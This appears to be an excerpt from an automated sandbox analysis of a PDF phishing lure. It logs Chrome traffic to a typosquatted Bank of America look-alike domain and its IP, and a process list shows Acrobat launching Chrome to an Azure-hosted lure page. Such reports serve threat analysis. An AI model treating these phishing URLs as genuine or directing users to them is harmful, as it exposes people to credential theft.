                                                                                              45192.168.2.1659118188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:13 UTC551OUTGET /submit.php HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:14 UTC276INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:13 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Content-Length: 0
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              46192.168.2.1659119188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:15 UTC847OUTGET /assets/error-large.gif HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                              Sec-Fetch-Site: same-origin
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: image
                                                                                              Referer: https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.css
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
                                                                                              2025-01-15 18:42:15 UTC251INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:15 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 16:04:02 GMT
                                                                                              ETag: "35bf-61181e47b4080"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 13759
                                                                                              Connection: close
                                                                                              Content-Type: image/gif
                                                                                              2025-01-15 18:42:15 UTC13759INData Raw: 47 49 46 38 39 61 29 00 28 00 d5 00 00 b4 00 02 f0 9f a3 dd 2a 2e d6 09 1e fc f0 f1 c5 3f 3f c6 03 10 da 19 26 ca 4f 4f f1 cf cf cf 5f 5f d7 3c 2f cd 1c 1e df 39 49 ec bf bf d2 31 28 d5 04 1c dd 8f 8f e2 40 39 ff ff ff b7 03 05 bb 1f 1f bc 10 0d d7 0e 21 db 21 2a e5 4c 3f e7 af af e6 51 41 df 32 32 dc 26 2c cf 22 20 e4 49 3d e1 3b 36 cb 10 18 f4 b8 bc ce 03 17 f3 ae aa f5 df df b7 0f 0f fd f4 f4 cc 29 21 e3 42 3a e0 43 4e b8 08 07 f2 b2 b8 cd 19 1c b5 08 00 d9 17 25 e1 39 35 c9 07 13 cd 07 16 d6 31 29 e1 44 4f ce 31 21 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 ff 0b 58 4d 50 20 44 61 74 61 58 4d 50 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69
                                                                                              Data Ascii: GIF89a)(*.??&OO__</9I1(@9!!*L?QA22&," I=;6)!B:CN%951)DO1!!XMP DataXMP<?xpacket begin="" id="W5M0MpCehi


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              47192.168.2.1659120188.119.66.1544438024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-15 18:42:16 UTC551OUTGET /assets/error-large.gif HTTP/1.1
                                                                                              Host: online.access.secure.bankofamerlica.com
                                                                                              Connection: keep-alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: none
                                                                                              Sec-Fetch-Mode: cors
                                                                                              Sec-Fetch-Dest: empty
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Cookie: PHPSESSID=alsdop4fv79usle9amccp2tfgp; referer=aHR0cHM6Ly9jb25maXJtYXRpb25vbmxpbmUuYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=1; ppath=auth/reset/reset-entry/
                                                                                              2025-01-15 18:42:17 UTC251INHTTP/1.1 200 OK
                                                                                              Date: Wed, 15 Jan 2025 18:42:16 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Last-Modified: Fri, 16 Feb 2024 16:04:02 GMT
                                                                                              ETag: "35bf-61181e47b4080"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 13759
                                                                                              Connection: close
                                                                                              Content-Type: image/gif
                                                                                              2025-01-15 18:42:17 UTC13759INData Raw: 47 49 46 38 39 61 29 00 28 00 d5 00 00 b4 00 02 f0 9f a3 dd 2a 2e d6 09 1e fc f0 f1 c5 3f 3f c6 03 10 da 19 26 ca 4f 4f f1 cf cf cf 5f 5f d7 3c 2f cd 1c 1e df 39 49 ec bf bf d2 31 28 d5 04 1c dd 8f 8f e2 40 39 ff ff ff b7 03 05 bb 1f 1f bc 10 0d d7 0e 21 db 21 2a e5 4c 3f e7 af af e6 51 41 df 32 32 dc 26 2c cf 22 20 e4 49 3d e1 3b 36 cb 10 18 f4 b8 bc ce 03 17 f3 ae aa f5 df df b7 0f 0f fd f4 f4 cc 29 21 e3 42 3a e0 43 4e b8 08 07 f2 b2 b8 cd 19 1c b5 08 00 d9 17 25 e1 39 35 c9 07 13 cd 07 16 d6 31 29 e1 44 4f ce 31 21 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 ff 0b 58 4d 50 20 44 61 74 61 58 4d 50 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69
                                                                                              Data Ascii: GIF89a)(*.??&OO__</9I1(@9!!*L?QA22&," I=;6)!B:CN%951)DO1!!XMP DataXMP<?xpacket begin="" id="W5M0MpCehi


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:13:41:17
                                                                                              Start date:15/01/2025
                                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\0430tely.pdf"
                                                                                              Imagebase:0x7ff660730000
                                                                                              File size:5'641'176 bytes
                                                                                              MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:2
                                                                                              Start time:13:41:18
                                                                                              Start date:15/01/2025
                                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                              Imagebase:0x7ff74c5d0000
                                                                                              File size:3'581'912 bytes
                                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:3
                                                                                              Start time:13:41:19
                                                                                              Start date:15/01/2025
                                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1580,i,6253502165632248395,16397532995403406337,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                              Imagebase:0x7ff74c5d0000
                                                                                              File size:3'581'912 bytes
                                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:13
                                                                                              Start time:13:41:47
                                                                                              Start date:15/01/2025
                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://confirmationonline.blob.core.windows.net/attestation/complete.html?1da72
                                                                                              Imagebase:0x7ff7f9810000
                                                                                              File size:3'242'272 bytes
                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Target ID:14
                                                                                              Start time:13:41:48
                                                                                              Start date:15/01/2025
                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=1788,i,3425846688857665517,9014097320282314136,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                              Imagebase:0x7ff7f9810000
                                                                                              File size:3'242'272 bytes
                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              No disassembly